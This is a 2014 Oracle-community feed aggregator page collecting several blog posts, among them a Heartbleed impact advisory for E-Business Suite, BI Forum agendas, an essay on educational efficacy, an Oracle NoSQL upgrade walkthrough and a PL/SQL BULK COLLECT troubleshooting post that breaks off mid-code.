Skip navigation.

Feed aggregator

First blogpost at my own hosted wordpress instance

Dietmar Aust - Mon, 2014-04-14 15:50
I have been blogging at daust.blogspot.com for quite some years now ... and many people have rather preferred wordpress to blogspot, I can now understand why :).

It is quite flexible and easy to use and there are tons of themes available ... really cool ones.

The main decision to host my own wordpress instance was in the end motivated by different means. I have created two products and they needed a platform to be presented:
First I wanted to buy a new theme from themeforest and build an APEX theme for that ... but this is a lot of work.

I then decided to host my content using wordpress since I have already bought a new theme: http://www.kriesi.at/themedemo/?theme=enfold

And this one has a really easy setup procedure for wordpress and comes with a ton of effects and wizards, cool page designer, etc.

Hopefully this will get mit motivated to post more frequently ... we will see ;).

Cheers,
~Dietmar.

OpenSSL Heartbleed (CVE-2014-0160) and Oracle E-Business Suite Impact

Integrigy has completed an in-depth security analysis of the "Heartbleed" vulnerability in OpenSSL (CVE-2014-0160) and the impact on Oracle E-Business Suite 11i (11.5) and R12 (12.0, 12.1, and 12.2) environments.  The key issue is where in the environment is the SSL termination point both for internal and external communication between the client browser and application servers. 

1.  If the SSL termination point is the Oracle E-Business Suite application servers, then the environment is not vulnerable as stated in Oracle's guidance (Oracle Support Note ID 1645479.1 “OpenSSL Security Bug-Heartbleed” [support login required]).

2.  If the SSL termination point is a load balancer or reverse proxy, then the Oracle E-Business Suite environment MAY BE VULNERABLE to the Heartbleed vulnerability.  Environments using load balancers, like F5 Big-IP, or reverse proxies, such as Apache mod_proxy or BlueCoat, may be vulnerable depending on software versions.

Integrigy's detailed analysis of use of OpenSSL in Oracle E-Business Environments is available here -

OpenSSL Heartbleed (CVE-2014-0160) and the Oracle E-Business Suite Impact Analysis

Please let us know if you have any questions or need additional information at info@integrigy.com.

Tags: VulnerabilityOracle E-Business Suite
Categories: APPS Blogs, Security Blogs

Integrigy Collaborate 2014 Presentations

Integrigy had a great time at Collaborate 2014 last week in Las Vegas.  What did not stay in Las Vegas were many great sessions and a lot of good information on Oracle E-Business Suite 12.2, Oracle Security, and OBIEE.  Posted below are the links to the three papers that Integrigy presented.

If you have questions about our presentations, or any questions about OBIEE and E-Business Suite security, please contact us at info@integrigy.com

References Tags: Oracle DatabaseOracle E-Business SuiteOracle Business Intelligence (OBIEE)
Categories: APPS Blogs, Security Blogs

Parallel Execution Skew – Demonstrating Skew

Randolf Geist - Mon, 2014-04-14 12:42
This is just a short notice that the next part of the mini-series "Parallel Execution Skew" is published at AllThingsOracle.com

Final Timetable and Agenda for the Brighton and Atlanta BI Forums, May 2014

Rittman Mead Consulting - Mon, 2014-04-14 07:00

It’s just a few weeks now until the Rittman Mead BI Forum 2014 events in Brighton and Atlanta, and there’s still a few spaces left at both events if you’d still like to come – check out the main BI Forum 2014 event page, and the booking links for Brighton (May 7th – 9th 2014) and Atlanta (May 14th – 16th 2014).

We’re also able now to publish the timetable and running order for the two events – session order can still change between now at the events, but this what we’re planning to run, first of all in Brighton, with the photos below from last year’s BI Forum.

Brighton

Brighton BI Forum 2014, Hotel

Seattle, Brighton

Wednesday 7th May 2014 – Optional 1-Day Masterclass, and Opening Drinks, Keynote and Dinner

  • 9.00 – 10.00 – Registration
  • 10.00 – 11.00 : Lars George Hadoop Masterclass Part 1
  • 11.00 – 11.15 : Morning Coffee 
  • 11.15 – 12.15 : Lars George Hadoop Masterclass Part 2
  • 12.15 – 13.15 : Lunch
  • 13.15 – 14.15 : Lars George Hadoop Masterclass Part 3
  • 14.15 – 14.30 : Afternoon Tea/Coffee/Beers
  • 14.30 – 15.30 : Lars George Hadoop Masterclass Part 4
  • 17.00 – 19.00 : Registration and Drinks Reception
  • 19.00 – Late :  Oracle Keynote and Dinner at Hotel
Thursday 8th May 2014
  • 08.45 – 09.00 : Opening Remarks Mark Rittman, Rittman Mead
  • 09.00 – 10.00 : Emiel van Bockel : Extreme Intelligence, made possible by …
  • 10.00 – 10.30 : Morning Coffee 
  • 10.30 – 11.30 : Chris Jenkins : TimesTen for Exalytics: Best Practices and Optimisation
  • 11.30 – 12.30 : Robin Moffatt : No Silver Bullets : OBIEE Performance in the Real World
  • 12.30 – 13.30 : Lunch
  • 13.30 – 14.30 : Adam Bloom : Building a BI Cloud
  • 14.30 – 14.45 : TED: Paul Oprea : “Extreme Data Warehousing”
  • 14.45 – 15.00 : TED : Michael Rainey :  ”A Picture Can Replace A Thousand Words”
  • 15.00 – 15.30 : Afternoon Tea/Coffee/Beers
  • 15.30 – 15.45 : Reiner Zimmerman : About the Oracle DW Global Leaders Program
  • 15.45 – 16.45 : Andrew Bond & Stewart Bryson : Enterprise Big Data Architecture
  • 19.00 – Late: Depart for Gala Dinner, St Georges Church, Brighton

Friday 9th May 2014

  • 9.00 – 10.00 : Truls Bergensen – Drawing in a New Rock on the Map – How will of Endeca Fit in to Your Oracle BI Topography
  • 10.00 – 10.30 : Morning Coffee 
  • 10.30 – 11.30 : Nicholas Hurt & Michael Rainey : Real-time Data Warehouse Upgrade – Success Stories
  • 11.30 – 12.30 : Matt Bedin & Adam Bloom : Analytics and the Cloud
  • 12.30 – 13.30 : Lunch13.30 – 14.30 : Gianni Ceresa : Essbase within/without OBIEE – not just an aggregation engine
  • 14.30 – 14.45 : TED : Marco Klaasen : “Speed up RPD Development”
  • 14.45 – 15:00 : TED : Christian Berg : “Neo’s Voyage in OBIEE:”
  • 15.00 – 15.30 : Afternoon Tea/Coffee/Beers
  • 15.30 – 16.30 : Alistair Burgess : “Tuning TimesTen with Aggregate Persistence”
  • 16.30 – 16.45 : Closing Remarks (Mark Rittman)
Then directly after Brighton we’ve got the US Atlanta event, running the week after, Wednesday – Friday, with last year’s photos below:   Us

Atlanta BI Forum 2014, Renaissance Mid-Town Hotel, Atlanta

Wednesday 14th May 2014 – Optional 1-Day Masterclass, and and Opening Drinks, Keynote and Dinner

  • 9.00-10.00 – Registration
  • 10.00 – 11.00 : Lars George Hadoop Masterclass Part 1
  • 11.00 – 11.15 : Morning Coffee 
  • 11.15 – 12.15 : Lars George Hadoop Masterclass Part 2
  • 12.15 – 13.15 : Lunch
  • 13.15 – 14.15 : Lars George Hadoop Masterclass Part 3
  • 14.15 – 14.30 : Afternoon Tea/Coffee/Beers
  • 14.30 – 15.30 : Lars George Hadoop Masterclass Part 4
  • 16.00 – 18.00 : Registration and Drinks Reception
  • 18.00 – 19.00 : Oracle Keynote & Dinner

Thursday 15th May 2014

  • 08.45 – 09.00 : Opening Remarks Mark Rittman, Rittman Mead
  • 09.00 – 10.00 : Kevin McGinley : Adding 3rd Party Visualization to OBIEE
  • 10.00 – 10.30 : Morning Coffee 
  • 10.30 – 11.30 : Chris Linskey : Endeca Information Discovery for Self-Service and Big Data
  • 11.30 – 12.30 : Omri Traub : Endeca and Big Data: A Vision for the Future
  • 12.30 – 13.30 : Lunch
  • 13.30 – 14.30 : Dan Vlamis : Capitalizing on Analytics in the Oracle Database in BI Applications
  • 14.30 – 15.30 : Susan Cheung : TimesTen In-Memory Database for Analytics – Best Practices and Use Cases
  • 15.30 – 15.45 : Afternoon Tea/Coffee/Beers
  • 15.45 – 16.45 : Christian Screen : Oracle BI Got MAD and You Should Be Happy
  • 18.00 – 19.00 : Special Guest Keynote : Maria Colgan : An introduction to the new Oracle Database In-Memory option
  • 19.00 – leave for dinner

Friday 16th May 2014

  • 09.00 – 10.00 : Patrick Rafferty : More Than Mashups – Advanced Visualizations and Data Discovery
  • 10.00 – 10.30 : Morning Coffee 
  • 10.30 – 11.30 : Matt Bedin : Analytics and the Cloud
  • 11.30 – 12.30 : Jack Berkowitz : Analytic Applications and the Cloud
  • 12.30 – 13.30 : Lunch
  • 13.30 – 14.30 : Philippe Lions : What’s new on 2014 HY1 OBIEE SampleApp
  • 14.30 – 15.30 : Stewart Bryson : ExtremeBI: Agile, Real-Time BI with Oracle Business Intelligence, Oracle Data Integrator and Oracle GoldenGate
  • 15.30 – 16.00 : Afternoon Tea/Coffee/Beers
  • 16.00 – 17.00 : Wayne Van Sluys : Everything You Know about Oracle Essbase Tuning is Wrong or Outdated!
  • 17.00 – 17.15 : Closing Remarks (Mark Rittman)
Full details of the two events, including more on the Hadoop Masterclass with Cloudera’s Lars George, can be found on the BI Forum 2014 home page.

Categories: BI & Warehousing

Head in the Oven, Feet in the Freezer

Michael Feldstein - Mon, 2014-04-14 05:19

Some days, the internet gods are kind. On April 9th, I wrote,

We want talking about educational efficacy to be like talking about the efficacy of Advil for treating arthritis. But it’s closer to talking about the efficacy of various chemotherapy drugs for treating a particular cancer. And we’re really really bad at talking about that kind of efficacy. I think we have our work cut out for us if we really want to be able to talk intelligently and intelligibly about the effectiveness of any particular educational intervention.

On the very same day, the estimable Larry Cuban blogged,

So it is hardly surprising, then, that many others, including myself, have been skeptical of the popular idea that evidence-based policymaking and evidence-based instruction can drive teaching practice. Those doubts have grown larger when one notes what has occurred in clinical medicine with its frequent U-turns in evidence-based “best practices.” Consider, for example, how new studies have often reversed prior “evidence-based” medical procedures. *Hormone therapy for post-menopausal women to reduce heart attacks wasfound to be more harmful than no intervention at all. *Getting a PSA test to determine whether the prostate gland showed signs of cancer for men over the age of 50 was “best practice” until 2012 when advisory panels of doctors recommended that no one under 55 should be tested and those older  might be tested if they had family histories of prostate cancer. And then there are new studies that recommend women to have annual mammograms, not at age  50 as recommended for decades, but at age 40. Or research syntheses (sometimes called “meta-analyses”) that showed anti-depressant pills worked no better than placebos. These large studies done with randomized clinical trials–the current gold standard for producing evidence-based medical practice–have, over time, produced reversals in practice. Such turnarounds, when popularized in the press (although media attention does not mean that practitioners actually change what they do with patients) often diminished faith in medical research leaving most of us–and I include myself–stuck as to which healthy practices we should continue and which we should drop. Should I, for example, eat butter or margarine to prevent a heart attack? In the 1980s, the answer was: Don’t eat butter, cheese, beef, and similar high-saturated fat products. Yet a recent meta-analysis of those and subsequent studies reached an opposite conclusion. Figuring out what to do is hard because I, as a researcher, teacher, and person who wants to maintain good health has to sort out what studies say and  how those studies were done from what the media report, and then how all of that applies to me. Should I take a PSA test? Should I switch from margarine to butter?

He put it much better than I did. While the gains in overall modern medicine have been amazing, anybody who has had even a moderately complex health issue (like back pain, for example) has had the frustrating experience of having a billion tests, being passed from specialist to specialist, and getting no clear answers.1 More on this point later. Larry’s next post—actually a guest post by Francis Schrag—is an imaginary argument between an evidence-based education proponent and a skeptic. I won’t quote it here, but it is well worth reading in full. My own position is somewhere between the proponent and the skeptic, though leaning more in the direction of the proponent. I don’t think we can measure everything that’s important about education, and it’s very clear that pretending that we can has caused serious damage to our educational system. But that doesn’t mean I think we should abandon all attempts to formulate a science of education. For me, it’s all about literacy. I want to give teachers and students skills to interpret the evidence for themselves and then empower them to use their own judgment. To that end, let’s look at the other half of Larry’s April 9 post, the title of which is “What’s The Evidence on School Devices and Software Improving Student Learning?”

Lies, Damned Lies, and…

The heart of the post is a study by John Hattie, a Professor at the University of Auckland (NZ). He’s done meta-analysis on an enormous number of education studies, looking at effect sizes, measured on a scale from 0.1, which is negligible, to 1.0, which is a full standard deviation.

He found that the “typical” effect size of an innovation was 0.4. To compare different classroom approaches shaped student learning, Hattie used the “typical” effect size (0.4) to mean that a practice reached the threshold of influence on student learning (p. 5). From his meta-analyses, he then found that class size had a .20 effect (slide 15) while direct instruction had a .59 effect (slide 21). Again and again, he found that teacher feedback had an effect size of .72 (slide 32). Moreover, teacher-directed strategies of increasing student verbalization (.67) and teaching meta-cognition strategies (.67) had substantial effects (slide 32). What about student use of computers (p. 7)? Hattie included many “effect sizes” of computer use from distance education (.09), multimedia methods (.15), programmed instruction (.24), and computer-assisted instruction (.37). Except for “hypermedia instruction” (.41), all fell below the “typical ” effect size (.40) of innovations improving student learning (slides 14-18). Across all studies of computers, then, Hattie found an overall effect size of .31 (p. 4).

The conclusion is that changing a classroom practice can often produce a significant effect size while adding a technology rarely does. But as my father likes to say, if you stick your head in the oven and your feet in the freezer, on average you’ll be comfortable. Let’s think about introducing clickers to a classroom, for example. What class are you using them in? How often do you use them? When do you use them? What do you use them for? Clickers in and of themselves change nothing. No intervention is going to be educationally effective unless it gets students to perceive, act, and think differently. There are lots of ways to use clickers in the classroom that have no such effect. My guess is that, most of the time, they are used for formative assessments. Those can be helpful or not, but generally when done in this way are more about informing the teacher than they are directly about helping the student. But there are other uses of clicker technologies. For example, University of Michigan professor Perry Samson recently blogged about using clickers to compare students’ sense of their physical and emotional well-being with their test performance:

Figure 2.  Example of results from a student wellness question for a specific class day.  Note the general collinearity of physical and emotional wellness.
FIGURE 2. EXAMPLE OF RESULTS FROM A STUDENT WELLNESS QUESTION FOR A SPECIFIC CLASS DAY. NOTE THE GENERAL COLLINEARITY OF PHYSICAL AND EMOTIONAL WELLNESS.

I have observed over the last few years that a majority of the students who were withdrawing from my course in mid-semester commented on a crisis in health or emotion in their lives.  On a lark this semester I created an image-based question to ask students in LectureTools at the beginning of each class (example, Figure 2) that requested their self assessment of their current physical and emotional state. Clearly there is a wide variation in students’ perceptions of their physical and emotional state.  To analyze these data I performed cluster analysis on students’ reported emotional state prior to the first exam and found that temporal trends in this measure of emotional state could be clustered into six categories.

Figure 3.  Trends in students' self reported emotional state prior to the first exam in class are clustered into six categories.  The average emotional state for each cluster appears to be predictive of median first exam scores.
FIGURE 3. TRENDS IN STUDENTS’ SELF REPORTED EMOTIONAL STATE PRIOR TO THE FIRST EXAM IN CLASS ARE CLUSTERED INTO SIX CATEGORIES. THE AVERAGE EMOTIONAL STATE FOR EACH CLUSTER APPEARS TO BE PREDICTIVE OF MEDIAN FIRST EXAM SCORES.

Perhaps not surprisingly Figure 3 shows that student outcomes on the first exam were very much related to the students’ self assessment of their emotional state prior to the exam.  This result is hard evidence for the intuitive, that students perform better when they are in a better emotional state.

I don’t know what Perry will end up doing with this information in terms of a classroom intervention. Nor do I know whether any such intervention will be effective. But it seems common sense not to lump it in with a million billion professors asking quiz questions on their clickers to aggregate it into an average of how effective clickers are. To be fair, that’s not Larry’s point for quoting the Hattie study. He’s arguing against the reductionist argument that technology fixes everything—an argument which seems obviously absurd to everybody except, sadly, the people who seem to have the power to make decisions. But my point is that it is equally absurd to use this study as evidence that technology is generally not helpful. What I think it suggests is that it makes little sense to study the efficacy of educational technologies or products outside the context of the efficacy of the practices that they enable. More importantly, it’s a good example of how we all need to get much more sophisticated about reading the studies so we can judge for ourselves what they do and do not prove.

Of Back Mice and Men

I have had moderate to severe back pain for the past seven years. I have been to see orthopedists, pain specialists, rheumatologists, urologists, chiropractors, physical therapists, acupuncturists, and massage therapists. In many cases, I have seen more than one in any given category. I had X-rays, CAT scans, MRIs, and electrical probes inserted into my abdomen and legs. I had many needles of widely varying gauges stuck in me, grown humans walking on my back, gallons of steroids injected into me. I had the protective sheathes of my nerves fried with electricity. If you’ve ever had chronic pain, you know that you would probably go to a voodoo priest and drink goat urine if you thought it might help. (Sadly, there are apparently no voodoo priests in my area of Massachusetts—or at least none who have a web page.) Nobody I went to could help me. Not too long ago, I had cause to visit my primary care physician, who is a good old country doctor. No specialist certificates, no Ivy League medical school degrees. Just a solid GP with some horse sense. In a state of despair, I explained my situation to him. He said, “Can I try something? Does it hurt when I touch you here?” OUCH!!!! It turns out that I have a condition called “back mice,” also called “episacral lipomas” when it is referred to in the medical literature, which, it turns out, happens rarely. I won’t go into the details of what they are, because that’s not important to the story. What’s important is what the doctor said next. “There’s hardly anything on them in the literature,” he said. “The thing is, they don’t show up on any scans. They’re impossible to diagnose unless you actually touch the patient’s back.” I thought back to all the specialists I had seen over the years. None of the doctors ever once touched my back. Not one. My massage therapist actually found the back mice, but she didn’t know what they were, and neither of us knew that they were significant. It turns out that once my GP discovered that these things exist, he started finding them everywhere. He told me a story of an eighty-year-old woman who had been hospitalized for “non-specific back pain.” They doped her up with opiates and the poor thing couldn’t stand up without falling over. He gave her a couple of shots in the right place, and a week later she was fine. He has changed my life as well. I am not yet all better—we just started treatment two weeks ago—but I am already dramatically better. The thing is, my doctor is an empiricist. In fact, he is one of the best diagnosticians I know. (And I have now met many.) He knew about back mice in the first place because he reads the literature avidly. But believing in the value of evidence and research is not the same thing as believing that only that which has been tested, measured, and statistically verified has value. Evidence should be a tool in the service of judgment, not a substitute for it. Isn’t that what we try to teach our students?

  1. But I’m not bitter.

The post Head in the Oven, Feet in the Freezer appeared first on e-Literate.

Big Data Oracle NoSQL in No Time - It is time to Upgrade

Senthil Rajendran - Mon, 2014-04-14 03:54
Big Data Oracle NoSQL in No Time - It is time to Upgrade 
Oracle NoSQL upgrade from 11gR2 to 12cR1 ( 2.0 to 3.0 )

Index
Big Data Oracle NoSQL in No Time - Getting Started Part 1
Big Data Oracle NoSQL in No Time - Startup & Shutdown Part 2
Big Data Oracle NoSQL in No Time - Setting up 1x1 Topology Part 3
Big Data Oracle NoSQL in No Time - Expanding 1x1 to 3x1 Topology Part 4
Big Data Oracle NoSQL in No Time - From 3x1 to 3x3 Topology Part 5
Big Data Oracle NoSQL in No Time - Smoke Testing Part 6
Big Data Oracle NoSQL in No Time - Increasing Throughput Read/Write Part 7

The upgrade is simple , nosql is brilliant with its simplicity.














The below are the steps

  • verify prerequisite - here we verify that the storage nodes are meeting the required prerequisite for upgrading.
  • show upgrade-order - here we get the list of storage nodes in order that can be upgraded
  • replace the software - unzip the new software
  • verify upgrade - we verify if the storage nodes are upgraded to the version that we downloaded.
In our scenario we have 4x4 deployment topology with one admin node and here we will upgrade from 11gR2 to 12cR1First let us upgrade on of the admin node.

$ export KVHOME=$KVBASE/server1/oraclesoftware/kv-2.0.39$ java -jar $KVHOME/lib/kvstore.jar stop -root $KVBASE/server1/storage$ cd $KVBASE/server1/oraclesoftware$ cp -Rf $KVBASE/stage/kv-3.0.5 .$ export KVHOME=$KVBASE/server1/oraclesoftware/kv-3.0.5$ nohup java -jar $KVHOME/lib/kvstore.jar start -root $KVBASE/server1/storage &$ nohup: appending output to `nohup.out'$ java -jar $KVHOME/lib/kvstore.jar runadmin -port 5000 -host server1kv-> verify prerequisiteVerify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:33:50 UTCSee server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messagesVerify prerequisite: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verification complete, no violations.kv->kv-> show upgrade-orderCalculating upgrade order, target version: 12.1.3.0.5, prerequisite: 11.2.2.0.23sn3sn4sn2kv->
In our case the upgrade order is determined to be sn3,sn4 and then sn2. We can verify the upgrade order at each stage.
Now let us upgrade SN3
$ export KVHOME=$KVBASE/server3/oraclesoftware/kv-2.0.39$ java -jar $KVHOME/lib/kvstore.jar stop -root $KVBASE/server3/storage$$ cd $KVBASE/server3/oraclesoftware$ cp -Rf $KVBASE/stage/kv-3.0.5 .$ export KVHOME=$KVBASE/server3/oraclesoftware/kv-3.0.5$ nohup java -jar $KVHOME/lib/kvstore.jar start -root $KVBASE/server3/storage &$
kv->  verify prerequisiteVerify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:40:31 UTCSee server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messagesVerify prerequisite: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verification complete, no violations.kv->kv-> show upgrade-orderCalculating upgrade order, target version: 12.1.3.0.5, prerequisite: 11.2.2.0.23sn4sn2
kv->

Now let us upgrade SN4
$  export KVHOME=$KVBASE/server4/oraclesoftware/kv-2.0.39$ java -jar $KVHOME/lib/kvstore.jar stop -root $KVBASE/server4/storage$$ cd $KVBASE/server4/oraclesoftware$ cp -Rf $KVBASE/stage/kv-3.0.5 .$ export KVHOME=$KVBASE/server4/oraclesoftware/kv-3.0.5$ nohup java -jar $KVHOME/lib/kvstore.jar start -root $KVBASE/server4/storage &$
kv-> verify prerequisiteVerify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:42:30 UTCSee server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messagesVerify prerequisite: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verification complete, no violations.kv->
kv-> show upgrade-orderCalculating upgrade order, target version: 12.1.3.0.5, prerequisite: 11.2.2.0.23sn2
kv->
Now let us upgrade the last pending storage node SN2
$ export KVHOME=$KVBASE/server2/oraclesoftware/kv-2.0.39$ java -jar $KVHOME/lib/kvstore.jar stop -root $KVBASE/server2/storage$$ cd $KVBASE/server2/oraclesoftware$ cp -Rf $KVBASE/stage/kv-3.0.5 .$ export KVHOME=$KVBASE/server2/oraclesoftware/kv-3.0.5$ nohup java -jar $KVHOME/lib/kvstore.jar start -root $KVBASE/server2/storage &$
kv-> verify prerequisiteVerify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:44:12 UTCSee server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messagesVerify prerequisite: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify prerequisite: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verification complete, no violations.kv->
kv-> show upgrade-orderCalculating upgrade order, target version: 12.1.3.0.5, prerequisite: 11.2.2.0.23There are no nodes that need to be upgradedkv->
Let us quickly verify the upgrade process
kv-> verify upgradeVerify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:44:27 UTCSee server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messagesVerify upgrade: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify upgrade: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify upgrade: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407Verify upgrade: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verification complete, no violations.kv->

As a Oracle DBA I know the complexity in upgrade but upgrading NoSQL is different.

Mobile device management is a two-sided battle

Chris Foot - Mon, 2014-04-14 01:39

The rise of the Internet of Things and the bring-your-own-device phenomenon have shaped the way database administration specialists conduct mobile device management. Many of these professionals are employed by retailers using customer relationship management applications that collect and analyze data from smartphones, tablets and numerous other devices. This level of activity creates a web of connectivity that's difficult to manage and often necessitates expert surveillance. 

Managing the remote workplace 
Merchandisers are challenged with the task of effectively securing all mobile assets used by their employees. Many of these workers have access to sensitive corporate information, whether it be a product development files, customer loyalty account numbers or consumer payment data. According to CIO, some organizations lack the in-house IT resources to effectively manage the avenues through which intelligence flows from smartphones to servers. 

As a result, small and midsize businesses often outsource to remote database support services to gain a comprehensive overview of their BYOD operations. David Lingenfelter, an information security officer at Fiberlink, told the news source that the problem many SMBs face is that their employees are using their own individual mobile devices to access company information. Many large enterprises often provide their workers with such machines, so there's inherent surveillance over the connections they're making. 

Moving to the home front 
Small, medium and large retailers alike are continuing to use CRM, which provides these commodity-based businesses with specific information regarding individuals. IoT has launched the capabilities of these programs, delivering data from a wide variety of smart mechanisms such as cars, watches and even refrigerators. Information being funneled into company servers comes from remote devices, creating a unique kind of mobile device management for database administration services to employ. 

Frank Gillett, a contributor to InformationWeek, noted that many consumers are connecting numerous devices to a singular home-based network, providing merchandisers with a view of how a family or group of apartment mates interacts with the Web. In addition, routers and gateways are acting as defaults for making network-connected homes ubiquitous. 

"These devices bring the Internet to every room of the house, allowing smart gadgets with communications to replace their dumb processors," noted Gillett.

However, it's not as if the incoming information submitted by these networks can be thrown into a massive jumble. In order to provide security and organize the intelligence appropriately, remote DBA providers monitor the connections and organize the results into identifiable, actionable data. 

OOW : Call4Proposals ... J-2

Jean-Philippe Pinte - Mon, 2014-04-14 01:09
Si vous souhaitez témoigner lors de la prochaine édition d' Oracle Open World , il ne reste plus que 2 jours pour soumettre votre sujet :
http://www.oracle.com/openworld/call-for-papers/index.html 

Don’t use %NOTFOUND with BULK COLLECT

Michael Dinh - Sun, 2014-04-13 16:54

I was working on a script for the ultimate RMAN backup validation and hoping to submit the article for an Oracle conference.

To my chagrin, one version of the script was failing for one condition and the other version would failed for another condition.

Basically, the script was very buggy.

The objective is to create a RMAN script to validate 8 backupset at a time.

I decided to use Bulk Collect and Limit clause.

Currently there are only 6 backupset.

ARROW:(MDINH@db01):PRIMARY> create table t as SELECT * FROM V$BACKUP_SET WHERE incremental_level > 0;

Table created.

ARROW:(MDINH@db01):PRIMARY> select recid from t;

     RECID
----------
       609
       610
       611
       612
       613
       614

6 rows selected.

ARROW:(MDINH@db01):PRIMARY>

Using LIMIT 8 with only 6 records would result in ZERO records returned.

ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      EXIT WHEN c_level1%NOTFOUND;
 17      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 18      dbms_output.put_line(l_str);
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;

PL/SQL procedure successfully completed.

Why not output the results before EXIT WHEN clause?  Works just fine.

ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
